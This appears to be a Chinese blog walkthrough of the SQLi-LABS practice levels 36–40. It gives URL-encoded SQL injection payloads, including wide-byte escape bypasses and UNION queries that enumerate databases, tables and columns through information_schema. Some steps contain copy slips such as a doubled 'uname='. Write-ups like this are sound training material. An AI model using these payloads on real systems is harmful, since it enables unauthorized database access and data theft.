当前位置: 首页 > article >正文

SQLi-LABS靶场36-40通过攻略

less-36

这一关是转义函数换成了mysql_real_escape_string,绕过方法与35关一致

1.判断注入点

2.判断闭合方式

id=1'A0 --+

3.查看页面回显点

?id=-1%A0%27%20%20union%20select%201,2,3--+

4.查询数据库名

?id=-1%A0%27%20%20union%20select%201,database(),3--+

5.查询数据库的所有表

?id=-1%A0%27%20%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3--+

6.查询users表的所有字段

?id=-1%A0%27%20%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273),3--+

less-37

可以看到是一个post表单 

1.使用burp进行抓包

2.判断注入点

在uname后进行宽字节注入 发现会出现报错

3.查看页面回显点

uname=?id=-1%df' union select 1,2 --+

4.查询数据库名

uname=uname=?id=-1%df' union select 1,database() --+

5.查询数据库的所有表

uname=?id=-1%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

6.查询users表的所有字段

uname=?id=-1%A0%27%20%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273)--+

less-38

这一关是堆叠注入

1.判断注入点

当?id=1'时 页面会出现报错

2.判断闭合方式

?id=1' --+ 可以闭合成功

3.查看页面回显点

?id=-1' union select 1,2,3--+

4.查询数据库名

?id=-1' union select 1,database(),3--+

5.查询数据库的所有表

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

6.查询users表的所有数据

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

less-39

1.判断注入点

当?id=1'时 页面会出现报错

2.判断闭合方式

?id=1' --+ 发现单引号无法闭合 可能是整数型

?id=1 --+可以闭合成功 说明这个是整数型

3.查看页面回显点

?id=-1 union select 1,2,3--+

4.查询数据库名

?id=-1 union select 1,database(),3--+

5.查询数据库的所有表

?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

6.查询users表的所有字段

?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

less-40

1.判断注入点

正常页面

错误页面

2.判断闭合方式

当?id=1') --+时 可以闭合成功

3.查看页面回显点

?id=-1') union select 1,2,3 --+

4.查询数据库名

?id=-1') union select 1,database(),3 --+

5.查询数据库的所有表

?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

6.查询users表的所有字段

?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),3 --+


http://www.kler.cn/a/280360.html

相关文章:

  • Flask+LayUI开发手记(三):LayUI表格的后端数据分页展现
  • Redis持久化RDB/AOF
  • Spring Boot 应用中注册和使用 Filter
  • 大数据技术之 Flume概述、安装(1)
  • xshell 终端选中文本后自动执行ctrl+c
  • 【机器学习】逻辑回归
  • 【React原理 - 任务调度之中断恢复】
  • 软件测试学习笔记丨Pytest配置文件
  • Leetcode 46. 全排列 排列型回溯 C++实现
  • JS WebSocket 深度解析
  • 8.22-docker的部署及其使用
  • Linux的log日志排查
  • 7-11 矩阵转置
  • Java核心技术【二十六】Java 反射详解(基于 JDK 17)
  • cookie, session and token
  • Python脚本阿里云服务监控脚本
  • 93.WEB渗透测试-信息收集-Google语法(7)
  • 【YOLO系列】目标检测简介
  • 谈到这个痛点,写C的和不写C的码农都沉默了
  • Unity项目增加字体裁剪